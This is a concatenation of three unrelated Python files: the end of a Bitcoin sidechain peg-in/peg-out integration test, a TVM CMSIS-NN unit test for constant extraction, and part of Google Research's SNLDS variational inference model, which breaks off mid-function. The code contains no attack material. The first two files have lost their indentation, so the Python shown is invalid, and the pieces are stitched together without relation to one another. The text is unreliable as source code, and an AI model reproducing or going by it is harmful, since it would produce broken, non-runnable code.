bitcoind2start = bitcoin_bin_path+"/bitcoind -datadir="+bitcoin2_datadir
subprocess.Popen(bitcoind2start.split(), stdout=subprocess.PIPE)
sidechainstart = sidechain_bin_path+"/oceand -datadir="+sidechain_datadir + sidechain_args
subprocess.Popen(sidechainstart.split(), stdout=subprocess.PIPE)
sidechain2start = sidechain_bin_path+"/oceand -datadir="+sidechain2_datadir + sidechain_args
subprocess.Popen(sidechain2start.split(), stdout=subprocess.PIPE)
print("Daemons started")
time.sleep(3)
with open(bitcoin2_rpccookiefile, 'r') as f:
bitcoin2_rpccookie = f.readline()
bitcoin = AuthServiceProxy("http://bitcoinrpc:"+bitcoin_pass+"@127.0.0.1:"+str(bitcoin_port))
bitcoin2 = AuthServiceProxy("http://"+ bitcoin2_rpccookie +"@127.0.0.1:"+str(bitcoin2_port))
sidechain = AuthServiceProxy("http://sidechainrpc:"+sidechain_pass+"@127.0.0.1:"+str(sidechain_port))
sidechain2 = AuthServiceProxy("http://sidechainrpc2:"+sidechain2_pass+"@127.0.0.1:"+str(sidechain2_port))
print("Daemons started, making blocks to get funds")
bitcoin.generate(101)
sidechain.generate(101)
addr = bitcoin.getnewaddress()
# First, blackhole all 21M bitcoin that already exist (and test subtractfrom)
assert(sidechain.getwalletinfo()["balance"]["bitcoin"] == 21000000)
sidechain.sendtomainchain(addr, 21000000, True)
assert("bitcoin" not in sidechain.getwalletinfo()["balance"])
sidechain.generate(101)
addrs = sidechain.getpeginaddress()
txid1 = bitcoin.sendtoaddress(addrs["mainchain_address"], 24)
# 10+2 confirms required to get into mempool and confirm
bitcoin.generate(1)
time.sleep(2)
proof = bitcoin.gettxoutproof([txid1])
raw = bitcoin.getrawtransaction(txid1)
print("Attempting peg-in")
# First attempt fails the consensus check but gives useful result
try:
pegtxid = sidechain.claimpegin(raw, proof)
raise Exception("Peg-in should not be mature enough yet, need another block.")
except JSONRPCException as e:
assert("Peg-in Bitcoin transaction needs more confirmations to be sent." in e.error["message"])
pass
# Second attempt simply doesn't hit mempool bar
bitcoin.generate(10)
try:
pegtxid = sidechain.claimpegin(raw, proof)
raise Exception("Peg-in should not be mature enough yet, need another block.")
except JSONRPCException as e:
assert("Peg-in Bitcoin transaction needs more confirmations to be sent." in e.error["message"])
pass
# Should fail due to non-matching wallet address
try:
pegtxid = sidechain.claimpegin(raw, proof, sidechain.getnewaddress())
raise Exception("Peg-in with non-matching claim_script should fail.")
except JSONRPCException as e:
assert("Given claim_script does not match the given Bitcoin transaction." in e.error["message"])
pass
# 12 confirms allows in mempool
bitcoin.generate(1)
# Should succeed via wallet lookup for address match, and when given
pegtxid1 = sidechain.claimpegin(raw, proof)
# Will invalidate the block that confirms this transaction later
sync_all(bitcoin, bitcoin2)
blockhash = sync_all(sidechain, sidechain2)
sidechain.generate(5)
tx1 = sidechain.gettransaction(pegtxid1)
if "confirmations" in tx1 and tx1["confirmations"] == 6:
print("Peg-in is confirmed: Success!")
else:
raise Exception("Peg-in confirmation has failed.")
# Look at pegin fields
decoded = sidechain.decoderawtransaction(tx1["hex"])
assert decoded["vin"][0]["is_pegin"] == True
assert len(decoded["vin"][0]["pegin_witness"]) > 0
# Check that there's sufficient fee for the peg-in
vsize = decoded["vsize"]
fee_output = decoded["vout"][1]
fallbackfee_pervbyte = Decimal("0.00001")/Decimal("1000")
assert fee_output["scriptPubKey"]["type"] == "fee"
assert fee_output["value"] >= fallbackfee_pervbyte*vsize
# Quick reorg checks of pegs
sidechain.invalidateblock(blockhash[0])
if sidechain.gettransaction(pegtxid1)["confirmations"] != 0:
raise Exception("Peg-in didn't unconfirm after invalidateblock call.")
# Re-enters block
sidechain.generate(1)
if sidechain.gettransaction(pegtxid1)["confirmations"] != 1:
raise Exception("Peg-in should have one confirm on side block.")
sidechain.reconsiderblock(blockhash[0])
if sidechain.gettransaction(pegtxid1)["confirmations"] != 6:
raise Exception("Peg-in should be back to 6 confirms.")
# Do many claims in mempool
n_claims = 5
print("Flooding mempool with many small claims")
pegtxs = []
sidechain.generate(101)
for i in range(n_claims):
addrs = sidechain.getpeginaddress()
txid = bitcoin.sendtoaddress(addrs["mainchain_address"], 1)
bitcoin.generate(12)
proof = bitcoin.gettxoutproof([txid])
raw = bitcoin.getrawtransaction(txid)
pegtxs += [sidechain.claimpegin(raw, proof)]
sync_all(bitcoin, bitcoin2)
sync_all(sidechain, sidechain2)
sidechain2.generate(1)
for pegtxid in pegtxs:
tx = sidechain.gettransaction(pegtxid)
if "confirmations" not in tx or tx["confirmations"] == 0:
raise Exception("Peg-in confirmation has failed.")
print("Test pegout")
test_pegout(bitcoin.getnewaddress(), sidechain)
print("Test pegout P2SH")
parent_chain_addr = bitcoin.getnewaddress()
parent_pubkey = bitcoin.validateaddress(parent_chain_addr)["pubkey"]
parent_chain_p2sh_addr = bitcoin.createmultisig(1, [parent_pubkey])["address"]
test_pegout(parent_chain_p2sh_addr, sidechain)
print("Test pegout Garbage")
parent_chain_addr = "garbage"
try:
test_pegout(parent_chain_addr, sidechain)
raise Exception("A garbage address should fail.")
except JSONRPCException as e:
assert("Invalid Bitcoin address" in e.error["message"])
pass
print("Test pegout Garbage valid")
prev_txid = sidechain.sendtoaddress(sidechain.getnewaddress(), 1)
sidechain.generate(1)
pegout_chain = 'a' * 64
pegout_hex = 'b' * 500
inputs = [{"txid": prev_txid, "vout": 0}]
outputs = {"vdata": [pegout_chain, pegout_hex]}
rawtx = sidechain.createrawtransaction(inputs, outputs)
raw_pegout = sidechain.decoderawtransaction(rawtx)
assert 'vout' in raw_pegout and len(raw_pegout['vout']) > 0
pegout_tested = False
for output in raw_pegout['vout']:
scriptPubKey = output['scriptPubKey']
if 'type' in scriptPubKey and scriptPubKey['type'] == 'nulldata':
assert ('pegout_hex' in scriptPubKey and 'pegout_asm' in scriptPubKey and 'pegout_type' in scriptPubKey and
'pegout_chain' in scriptPubKey and 'pegout_reqSigs' not in scriptPubKey and 'pegout_addresses' not in scriptPubKey)
assert scriptPubKey['pegout_type'] == 'nonstandard'
assert scriptPubKey['pegout_chain'] == pegout_chain
assert scriptPubKey['pegout_hex'] == pegout_hex
pegout_tested = True
break
assert pegout_tested
print ("Now test failure to validate peg-ins based on intermittant bitcoind rpc failure")
bitcoin2.stop()
# give bitcoin2 time to stop
time.sleep(1)
txid = bitcoin.sendtoaddress(addrs["mainchain_address"], 1)
bitcoin.generate(12)
proof = bitcoin.gettxoutproof([txid])
raw = bitcoin.getrawtransaction(txid)
stuck_peg = sidechain.claimpegin(raw, proof)
sidechain.generate(1)
print("Waiting to ensure block is being rejected by sidechain2")
time.sleep(5)
assert(sidechain.getblockcount() != sidechain2.getblockcount())
bitcoind2start = bitcoin_bin_path+"/bitcoind -datadir="+bitcoin2_datadir
subprocess.Popen(bitcoind2start.split(), stdout=subprocess.PIPE)
print("Restarting bitcoind2")
time.sleep(5)
with open(bitcoin2_rpccookiefile, 'r') as f:
bitcoin2_rpccookie = f.readline()
bitcoin2 = AuthServiceProxy("http://"+ bitcoin2_rpccookie +"@127.0.0.1:"+str(bitcoin2_port))
# Don't make a block: there is a race condition while the pegin-invalid block
# is awaiting further validation, during which nodes reject subsequent blocks,
# even ones they create themselves
sync_all(sidechain, sidechain2, False)
print("Now send funds out in two stages, partial, and full")
some_btc_addr = bitcoin.getnewaddress()
bal_1 = sidechain.getwalletinfo()["balance"]["bitcoin"]
try:
sidechain.sendtomainchain(some_btc_addr, bal_1 + 1)
raise Exception("Sending out too much; should have failed")
except JSONRPCException as e:
assert("Insufficient funds" in e.error["message"])
pass
assert(sidechain.getwalletinfo()["balance"]["bitcoin"] == bal_1)
try:
sidechain.sendtomainchain(some_btc_addr+"b", bal_1 - 1)
raise Exception("Sending to invalid address; should have failed")
except JSONRPCException as e:
assert("Invalid Bitcoin address" in e.error["message"])
pass
assert(sidechain.getwalletinfo()["balance"]["bitcoin"] == bal_1)
try:
sidechain.sendtomainchain("1Nro9WkpaKm9axmcfPVp79dAJU1Gx7VmMZ", bal_1 - 1)
raise Exception("Sending to mainchain address when should have been testnet; should have failed")
except JSONRPCException as e:
assert("Invalid Bitcoin address" in e.error["message"])
pass
assert(sidechain.getwalletinfo()["balance"]["bitcoin"] == bal_1)
peg_out_txid = sidechain.sendtomainchain(some_btc_addr, 1)
peg_out_details = sidechain.decoderawtransaction(sidechain.getrawtransaction(peg_out_txid))
# peg-out, change and (explicit) fee outputs
assert(len(peg_out_details["vout"]) == 3)
found_pegout_value = False
for output in peg_out_details["vout"]:
if "value" in output and output["value"] == 1:
found_pegout_value = True
assert(found_pegout_value)
bal_2 = sidechain.getwalletinfo()["balance"]["bitcoin"]
# Make sure balance went down
assert(bal_2 + 1 < bal_1)
sidechain.sendtomainchain(some_btc_addr, bal_2, True)
assert("bitcoin" not in sidechain.getwalletinfo()["balance"])
print("Success!")
except JSONRPCException as e:
print("Pegging testing failed, aborting:")
print(e.error)
except Exception as e:
print("Pegging testing failed, aborting:")
print(e)
print("Stopping daemons and cleaning up")
if bitcoin is not None:
bitcoin.stop()
if bitcoin2 is not None:
bitcoin2.stop()
if sidechain is not None:
sidechain.stop()
if sidechain2 is not None:
sidechain2.stop()
time.sleep(5)
shutil.rmtree(bitcoin2_datadir)
shutil.rmtree(sidechain2_datadir)
shutil.rmtree(sidechain_datadir)
shutil.rmtree(bitcoin_datadir)
|
<filename>tests/python/contrib/test_cmsisnn/test_extract_constants.py<gh_stars>1000+
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""CMSIS-NN integration tests: extract_constants pass"""
import itertools
import math
import sys
import numpy as np
import pytest
import tvm
from tvm import relay
from utils import (
make_module,
count_num_calls,
get_range_for_dtype_str,
get_same_padding,
get_conv2d_qnn_params,
make_qnn_relu,
)
tvm._ffi._init_api("relay.ext.cmsisnn.transform", __name__)
class CheckFunctionsForConstants(tvm.relay.ExprVisitor):
def __init__(self):
super().__init__()
self.num_constants_ = 0
def visit_call(self, call):
super().visit_call(call)
for arg in call.args:
if isinstance(arg, relay.Constant) and arg.data.numpy().ndim > 0:
self.num_constants_ += 1
def visit_function(self, func):
super().visit_function(func)
assert self.num_constants_ == 0, "Functions should not have constant arguments in Calls"
def set_external_func_attr(func, compiler, ext_symbol):
func = func.with_attr("Primitive", tvm.tir.IntImm("int32", 1))
func = func.with_attr("Compiler", compiler)
func = func.with_attr("global_symbol", ext_symbol)
return func
@tvm.testing.requires_cmsisnn
def test_external_function():
y0_data = np.random.uniform(0, 1, (8, 8)).astype("float32")
x0 = relay.var("x0", shape=(8, 8))
y0_const = relay.const(y0_data, "float32")
z0 = x0 + y0_const
ef = relay.Function([x0], z0, relay.TensorType((8, 8), "float32"))
ev = relay.GlobalVar("external_function")
ef = set_external_func_attr(ef, "external_compiler", ev.name_hint)
x = relay.var("x", shape=(8, 8))
c = relay.Call(ev, [x])
mf = relay.Function([x], c, relay.TensorType((8, 8), "float32"))
mv = relay.GlobalVar("main")
mod = tvm.IRModule()
mod[ev] = ef
mod[mv] = mf
mod = ExtractConstantsFromPartitionedFunction()(mod)
CheckFunctionsForConstants().visit_function(mod[ev])
relay.transform.InferType()(mod)
@tvm.testing.requires_cmsisnn
def test_nested_function():
y1_data = np.random.uniform(0, 1, (8, 8)).astype("float32")
x1 = relay.var("x1", shape=(8, 8))
y1_const = relay.const(y1_data, "float32")
z1 = x1 + y1_const
w1 = z1 * relay.const(5.0, "float32")
lf = relay.Function([x1], w1, relay.TensorType((8, 8), "float32"))
x0 = relay.var("x0", shape=(8, 8))
c0 = relay.Call(lf, [x0])
ef = relay.Function([x0], c0, relay.TensorType((8, 8), "float32"))
x = relay.var("x", shape=(8, 8))
ev = relay.GlobalVar("external_function")
ef = set_external_func_attr(ef, "external_compiler", ev.name_hint)
c = relay.Call(ev, [x])
mf = relay.Function([x], c, relay.TensorType((8, 8), "float32"))
mv = relay.GlobalVar("main")
mod = tvm.IRModule()
mod[ev] = ef
mod[mv] = mf
mod = ExtractConstantsFromPartitionedFunction()(mod)
CheckFunctionsForConstants().visit_function(mod[ev])
relay.transform.InferType()(mod)
@tvm.testing.requires_cmsisnn
def test_multiple_functions():
y20_data = np.random.uniform(0, 1, (8, 8)).astype("float32")
x20 = relay.var("x20", shape=(8, 8))
y20_const = relay.const(y20_data, "float32")
z20 = x20 + y20_const
f20 = relay.Function([x20], z20, relay.TensorType((8, 8), "float32"))
y21_data = np.random.uniform(0, 1, (8, 8)).astype("float32")
x21 = relay.var("x21", shape=(8, 8))
y21_const = relay.const(y21_data, "float32")
z21 = x21 + y21_const
f21 = relay.Function([x21], z21, relay.TensorType((8, 8), "float32"))
x10 = relay.var("x10", shape=(8, 8))
c10 = relay.Call(f20, [x10])
c11 = relay.Call(f21, [c10])
ef = relay.Function([x10], c11, relay.TensorType((8, 8), "float32"))
x0 = relay.var("x0", shape=(8, 8))
ev = relay.GlobalVar("external_function")
ef = set_external_func_attr(ef, "external_compiler", ev.name_hint)
c = relay.Call(ev, [x0])
mf = relay.Function([x0], c, relay.TensorType((8, 8), "float32"))
mv = relay.GlobalVar("main")
mod = tvm.IRModule()
mod[ev] = ef
mod[mv] = mf
mod = ExtractConstantsFromPartitionedFunction()(mod)
CheckFunctionsForConstants().visit_function(mod[ev])
relay.transform.InferType()(mod)
@tvm.testing.requires_cmsisnn
def test_main_function():
x0 = relay.var("x0", shape=(8, 8))
y0 = relay.var("y0", shape=(8, 8))
z0 = x0 + y0
ef = relay.Function([x0, y0], z0, relay.TensorType((8, 8), "float32"))
ev = relay.GlobalVar("external_function")
ef = set_external_func_attr(ef, "external_compiler", ev.name_hint)
x = relay.var("x", shape=(8, 8))
y_data = np.random.uniform(0, 1, (8, 8)).astype("float32")
y_const = relay.const(y_data, "float32")
z = x + y_const
c = relay.Call(ev, [x, z])
mf = relay.Function([x], c, relay.TensorType((8, 8), "float32"))
mv = relay.GlobalVar("main")
mod = tvm.IRModule()
mod[ev] = ef
mod[mv] = mf
mod = ExtractConstantsFromPartitionedFunction()(mod)
check_for_constants = CheckFunctionsForConstants()
check_for_constants.visit_call(mod[mv].body)
assert (
check_for_constants.num_constants_ == 1
), "main() should have same number of arguments as before"
if __name__ == "__main__":
sys.exit(pytest.main([__file__] + sys.argv[1:]))
|
# coding=utf-8
# Copyright 2020 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Collapsed Amortized Variational Inference for SNLDS.
This is a reasonable baseline model for a switching non-linear dynamical system
with the following architecture:
1. an inference network, with Bidirectional-RNN for input embedding, and a
forward RNN to get the posterior distribution of `q(z[1:T] | x[1:T])`.
2. a continuous state transition network, `p(z[t] | z[t-1], s[t])`.
3. a discrete state transition network that is conditioned on the input,
`p(s[t] | s[t-1], x[t-1])`.
4. an emission network conditioned on the continuous hidden dynamics,
`p(x[t] | z[t])`.
It also contains a function, `create_model()`, to help create the SNLDS
model described in ``Collapsed Amortized Variational Inference for Switching
Nonlinear Dynamical Systems``. 2019. https://arxiv.org/abs/1910.09588.
All the networks are configurable through function arguments `network_*`.
"""
import collections
import tensorflow as tf
import tensorflow_probability as tfp
from snlds import model_base
from snlds import utils
namedtuple = collections.namedtuple
layers = tf.keras.layers
tfd = tfp.distributions
tfpl = tfp.layers
RANDOM_SEED = 131
def construct_initial_state_distribution(
latent_dim,
num_categ,
use_trainable_cov=False,
use_triangular_cov=False,
raw_sigma_bias=0.0,
sigma_min=1e-5,
sigma_scale=0.05,
dtype=tf.float32,
name="z0"):
"""Construct the initial state distribution, `p(z[0])`.
Args:
latent_dim: an `int` scalar for dimension of continuous hidden states, `z`.
num_categ: an `int` scalar for number of discrete states, `s`.
use_trainable_cov: a `bool` scalar indicating whether the scale of `p(z[0])`
is trainable. Default to False.
use_triangular_cov: a `bool` scalar indicating whether to use triangular
covariance matrices and `tfp.distributions.MultivariateNormalTriL` for
distribution. Otherwise, a diagonal covariance matrix and
`tfp.distributions.MultivariateNormalDiag` will be used.
raw_sigma_bias: a `float` scalar to be added to the raw sigma, which is
standard deviation of the distribution. Default to `0.`.
sigma_min: a `float` scalar for minimal level of sigma to prevent
underflow. Default to `1e-5`.
sigma_scale: a `float` scalar for scaling the sigma. Default to `0.05`.
The above three arguments are used as
`sigma_scale * max(softmax(raw_sigma + raw_sigma_bias), sigma_min)`.
dtype: data type for variables within the scope. Default to `tf.float32`.
name: a `str` to construct names of variables.
Returns:
return_dist: a `tfp.distributions` instance for the initial state
distribution, `p(z[0])`.
"""
glorot_initializer = tf.keras.initializers.GlorotUniform()
z0_mean = tf.Variable(
initial_value=glorot_initializer(shape=[num_categ, latent_dim],
dtype=dtype),
name="{}_mean".format(name))
if use_triangular_cov:
z0_scale = tfp.math.fill_triangular(
tf.Variable(
initial_value=glorot_initializer(
shape=[int(latent_dim * (latent_dim + 1) / 2)],
dtype=dtype),
name="{}_scale".format(name),
trainable=use_trainable_cov))
z0_scale = (tf.maximum(tf.nn.softmax(z0_scale + raw_sigma_bias),
sigma_min)
* sigma_scale)
return_dist = tfd.Independent(
distribution=tfd.MultivariateNormalTriL(
loc=z0_mean, scale_tril=z0_scale),
reinterpreted_batch_ndims=0)
else:
z0_scale = tf.Variable(
initial_value=glorot_initializer(
shape=[latent_dim],
dtype=dtype),
name="{}_scale".format(name),
trainable=use_trainable_cov)
z0_scale = (tf.maximum(tf.nn.softmax(z0_scale + raw_sigma_bias),
sigma_min)
* sigma_scale)
return_dist = tfd.Independent(
distribution=tfd.MultivariateNormalDiag(
loc=z0_mean, scale_diag=z0_scale),
reinterpreted_batch_ndims=0)
return tfp.experimental.as_composite(return_dist)
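# A minimal usage sketch of the helper above (the argument values here are
# illustrative assumptions, not taken from any training configuration):
#
#   p_z0 = construct_initial_state_distribution(
#       latent_dim=4, num_categ=3, use_triangular_cov=True)
#   z0_samples = p_z0.sample(7)               # shape [7, num_categ, latent_dim]
#   z0_log_probs = p_z0.log_prob(z0_samples)  # shape [7, num_categ]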
class ContinuousStateTransition(tf.keras.Model):
"""Transition for `p(z[t] | z[t-1], s[t])`."""
def __init__(self,
transition_mean_networks,
distribution_dim,
num_categories=1,
cov_mat=None,
use_triangular_cov=False,
use_trainable_cov=True,
raw_sigma_bias=0.0,
sigma_min=1e-5,
sigma_scale=0.05,
dtype=tf.float32,
name="ContinuousStateTransition"):
"""Construct a `ContinuousStateTransition` instance.
Args:
transition_mean_networks: a list of `callable` networks, with the length
of list same as `num_categories`. Each one of the networks will take
previous step hidden state, `z[t-1]`, and returns the mean of
transition distribution, `p(z[t] | z[t-1], s[t]=i)` for each
discrete state `i`.
distribution_dim: an `int` scalar for dimension of continuous hidden
states, `z`.
num_categories: an `int` scalar for number of discrete states, `s`.
cov_mat: an optional `float` Tensor for predefined covariance matrix.
Default to `None`, in which case, a `cov` variable will be created.
use_triangular_cov: a `bool` scalar indicating whether to use triangular
covariance matrices and `tfp.distributions.MultivariateNormalTriL` for
distribution. Otherwise, a diagonal covariance matrix and
`tfp.distributions.MultivariateNormalDiag` will be used.
use_trainable_cov: a `bool` scalar indicating whether the scale of
the distribution is trainable. Default to True.
raw_sigma_bias: a `float` scalar to be added to the raw sigma, which is
standard deviation of the distribution. Default to `0.`.
sigma_min: a `float` scalar for minimal level of sigma to prevent
underflow. Default to `1e-5`.
sigma_scale: a `float` scalar for scaling the sigma. Default to `0.05`.
The above three arguments are used as
`sigma_scale * max(softmax(raw_sigma + raw_sigma_bias), sigma_min)`.
dtype: data type for variables within the scope. Default to `tf.float32`.
name: a `str` to construct names of variables.
"""
super(ContinuousStateTransition, self).__init__()
assertion_str = (
"There has to be one transition mean networks for each discrete state")
assert len(transition_mean_networks) == num_categories, assertion_str
self.z_trans_networks = transition_mean_networks
self.num_categ = num_categories
self.use_triangular_cov = use_triangular_cov
self.distribution_dim = distribution_dim
if cov_mat:
self.cov_mat = cov_mat
elif self.use_triangular_cov:
self.cov_mat = tfp.math.fill_triangular(
tf.Variable(
tf.random.uniform(
shape=[
int(self.distribution_dim
* (self.distribution_dim + 1) / 2)],
minval=0., maxval=1.,
dtype=dtype),
name="{}_cov".format(name),
dtype=dtype,
trainable=use_trainable_cov))
self.cov_mat = tf.maximum(tf.nn.softmax(self.cov_mat + raw_sigma_bias),
sigma_min) * sigma_scale
else:
self.cov_mat = tf.Variable(
tf.random.uniform(shape=[self.distribution_dim],
minval=0.0, maxval=1.,
dtype=dtype),
name="{}_cov".format(name),
dtype=dtype,
trainable=use_trainable_cov)
self.cov_mat = tf.maximum(tf.nn.softmax(self.cov_mat + raw_sigma_bias),
sigma_min) * sigma_scale
def call(self, input_tensor, dtype=tf.float32):
input_tensor = tf.convert_to_tensor(input_tensor, dtype_hint=dtype)
batch_size, num_steps, distribution_dim = tf.unstack(tf.shape(input_tensor))
# The shape of the mean_tensor after tf.stack is [num_categ, batch_size,
# num_steps, distribution_dim].
mean_tensor = tf.transpose(
tf.stack([
z_net(input_tensor) for z_net in self.z_trans_networks]),
[1, 2, 0, 3])
mean_tensor = tf.reshape(mean_tensor,
[batch_size, num_steps,
self.num_categ, distribution_dim])
if self.use_triangular_cov:
output_dist = tfd.MultivariateNormalTriL(
loc=mean_tensor,
scale_tril=self.cov_mat)
else:
output_dist = tfd.MultivariateNormalDiag(
loc=mean_tensor,
scale_diag=self.cov_mat)
return tfp.experimental.as_composite(output_dist)
@property
def output_event_dims(self):
return self.distribution_dim
class DiscreteStateTransition(tf.keras.Model):
"""Discrete state transition p(s[t] | s[t-1], x[t-1])."""
def __init__(self,
transition_network,
num_categories):
"""Construct a `DiscreteStateTransition` instance.
Args:
transition_network: a `callable` network taking batch conditional inputs,
`x[t-1]`, and returning the discrete state transition matrices,
`log p(s[t] |s[t-1], x[t-1])`.
num_categories: an `int` scalar for number of discrete states, `s`.
"""
super(DiscreteStateTransition, self).__init__()
self.dense_net = transition_network
self.num_categ = num_categories
def call(self, input_tensor, dtype=tf.float32):
input_tensor = tf.convert_to_tensor(input_tensor, dtype_hint=dtype)
batch_size, num_steps = tf.unstack(tf.shape(input_tensor)[:2])
transition_tensor = self.dense_net(input_tensor)
transition_tensor = tf.reshape(
transition_tensor,
[batch_size, num_steps, self.num_categ, self.num_categ])
return transition_tensor
@property
def output_event_dims(self):
return self.num_categ
class GaussianDistributionFromMean(tf.keras.Model):
"""Emission model p(x[t] | z[t])."""
def __init__(self,
emission_mean_network,
observation_dim,
cov_mat=None,
use_triangular_cov=False,
use_trainable_cov=True,
raw_sigma_bias=0.0,
sigma_min=1e-5,
sigma_scale=0.05,
dtype=tf.float32,
name="GaussianDistributionFromMean"):
"""Construct a `GaussianDistributionFromMean` instance.
Args:
emission_mean_network: a `callable` network taking continuous hidden
states, `z[t]`, and returning the mean of emission distribution,
`p(x[t] | z[t])`.
observation_dim: an `int` scalar for dimension of observations, `x`.
cov_mat: an optional `float` Tensor for predefined covariance matrix.
Default to `None`, in which case, a `cov` variable will be created.
use_triangular_cov: a `bool` scalar indicating whether to use triangular
covariance matrices and `tfp.distributions.MultivariateNormalTriL` for
distribution. Otherwise, a diagonal covariance matrix and
`tfp.distributions.MultivariateNormalDiag` will be used.
use_trainable_cov: a `bool` scalar indicating whether the scale of
the distribution is trainable. Default to True.
raw_sigma_bias: a `float` scalar to be added to the raw sigma, which is
standard deviation of the distribution. Default to `0.`.
sigma_min: a `float` scalar for minimal level of sigma to prevent
underflow. Default to `1e-5`.
sigma_scale: a `float` scalar for scaling the sigma. Default to `0.05`.
The above three arguments are used as
`sigma_scale * max(softmax(raw_sigma + raw_sigma_bias), sigma_min)`.
dtype: data type for variables within the scope. Default to `tf.float32`.
name: a `str` to construct names of variables.
"""
super(GaussianDistributionFromMean, self).__init__()
self.observation_dim = observation_dim
self.x_emission_net = emission_mean_network
self.use_triangular_cov = use_triangular_cov
if cov_mat:
self.cov_mat = cov_mat
elif self.use_triangular_cov:
local_variable = tf.Variable(
tf.random.uniform(
shape=[int(self.observation_dim*(self.observation_dim+1)/2)],
minval=0., maxval=1.,
dtype=dtype),
name="{}_cov".format(name),
dtype=dtype,
trainable=use_trainable_cov)
self.cov_mat = tfp.math.fill_triangular(
local_variable)
self.cov_mat = tf.maximum(tf.nn.softmax(self.cov_mat + raw_sigma_bias),
sigma_min) * sigma_scale
else:
self.cov_mat = tf.Variable(
initial_value=tf.random.uniform(shape=[self.observation_dim],
minval=0.0, maxval=1.,
dtype=dtype),
name="{}_cov".format(name),
dtype=dtype,
trainable=use_trainable_cov)
self.cov_mat = tf.maximum(tf.nn.softmax(self.cov_mat + raw_sigma_bias),
sigma_min) * sigma_scale
def call(self, input_tensor, dtype=tf.float32):
input_tensor = tf.convert_to_tensor(input_tensor, dtype_hint=dtype)
mean_tensor = self.x_emission_net(input_tensor)
if self.use_triangular_cov:
output_dist = tfd.MultivariateNormalTriL(
loc=mean_tensor,
scale_tril=self.cov_mat)
else:
output_dist = tfd.MultivariateNormalDiag(
loc=mean_tensor,
scale_diag=self.cov_mat)
return tfp.experimental.as_composite(output_dist)
@property
def output_event_dims(self):
return self.observation_dim
class RnnInferenceNetwork(tf.keras.Model):
"""Inference network for posterior q(z[1:T] | x[1:T])."""
def __init__(self,
posterior_rnn,
posterior_dist,
latent_dim,
embedding_network=None):
"""Construct a `RnnInferenceNetwork` instance.
Args:
posterior_rnn: a RNN cell, `h[t]=f_RNN(h[t-1], z[t-1], input[t])`,
which recursively takes previous step RNN states `h`, previous step
sampled dynamical state `z[t-1]`, and conditioned input `input[t]`.
posterior_dist: a distribution instance for `p(z[t] | h[t])`,
where h[t] is the output of `posterior_rnn`.
latent_dim: an `int` scalar for dimension of continuous hidden
states, `z`.
embedding_network: an optional network to embed the observations, `x[t]`.
Default to `None`, in which case, no embedding is applied.
"""
super(RnnInferenceNetwork, self).__init__()
self.latent_dim = latent_dim
self.posterior_rnn = posterior_rnn
self.posterior_dist = posterior_dist
if embedding_network is None:
self.embedding_network = lambda x: x
else:
self.embedding_network = embedding_network
def call(self,
inputs,
num_samples=1,
dtype=tf.float32,
random_seed=RANDOM_SEED,
parallel_iterations=10):
"""Recursively sample z[t] ~ q(z[t]|h[t]=f_RNN(h[t-1], z[t-1], h[t]^b)).
Args:
inputs: a float `Tensor` of size [batch_size, num_steps, obs_dim], where
each observation should be flattened.
num_samples: an `int` scalar for number of samples per time-step, for
posterior inference networks, `z[i] ~ q(z[1:T] | x[1:T])`.
dtype: The data type of input data.
random_seed: an `Int` as the seed for random number generator.
parallel_iterations: a positive `Int` indicating the number of iterations
allowed to run in parallel in `tf.while_loop`, which defaults to 10.
Returns:
sampled_z: a float 4-D `Tensor` of size [num_samples, batch_size,
num_steps, latent_dim], which stores the z_t sampled from posterior.
entropies: a float 3-D `Tensor` of size [num_samples, batch_size,
num_steps], which stores the entropies of posterior distributions.
log_probs: a float 3-D `Tensor` of size [num_samples, batch_size,
num_steps], which stores the log posterior probabilities.
"""
inputs = tf.convert_to_tensor(inputs, dtype_hint=dtype)
batch_size, num_steps = tf.unstack(tf.shape(inputs)[:2])
latent_dim = self.latent_dim
## passing through embedding_network, e.g. bidirectional RNN
inputs = self.embedding_network(inputs)
## passing through forward RNN
ta_names = ["rnn_states", "latent_states", "entropies", "log_probs"]
tas = [tf.TensorArray(tf.float32, num_steps, name=n) for n in ta_names]
t0 = tf.constant(0, tf.int32)
loopstate = namedtuple("LoopState", "rnn_state latent_encoded")
initial_rnn_state = self.posterior_rnn.get_initial_state(
batch_size=batch_size * num_samples,
dtype=dtype)
if (isinstance(self.posterior_rnn, layers.GRUCell)
or isinstance(self.posterior_rnn, layers.SimpleRNNCell)):
initial_rnn_state = [initial_rnn_state]
init_state = (t0,
loopstate(
rnn_state=initial_rnn_state,
latent_encoded=tf.zeros(
[batch_size * num_samples, latent_dim],
dtype=tf.float32)), tas)
def _cond(t, *unused_args):
return t < num_steps
def _step(t, loop_state, tas):
"""One step in tf.while_loop."""
prev_latent_state = loop_state.latent_encoded
prev_rnn_state = loop_state.rnn_state
current_input = inputs[:, t, :]
# Duplicate current observation to sample multiple trajectories.
current_input = tf.tile(current_input, [num_samples, 1])
rnn_input = tf.concat([current_input, prev_latent_state],
axis=-1) # num_samples * BS, latent_dim+input_dim
rnn_out, rnn_state = self.posterior_rnn(
inputs=rnn_input,
states=prev_rnn_state)
dist = self.posterior_dist(rnn_out)
latent_state = dist.sample(seed=random_seed)
## rnn_state is a list of [batch_size, rnn_hidden_dim],
## after TA.stack(), the dimension will be
## [num_steps, 1 for GRU/2 for LSTM, batch, rnn_dim]
tas_updates = [rnn_state,
latent_state,
dist.entropy(),
dist.log_prob(latent_state)]
tas = utils.write_updates_to_tas(tas, t, tas_updates)
return (t+1,
loopstate(rnn_state=rnn_state,
latent_encoded=latent_state),
tas)
## end of _step function
_, _, tas_final = tf.while_loop(
_cond, _step, init_state, parallel_iterations=parallel_iterations)
sampled_z, entropies, log_probs = [
utils.tensor_for_ta(ta, swap_batch_time=True) for ta in tas_final[1:]
]
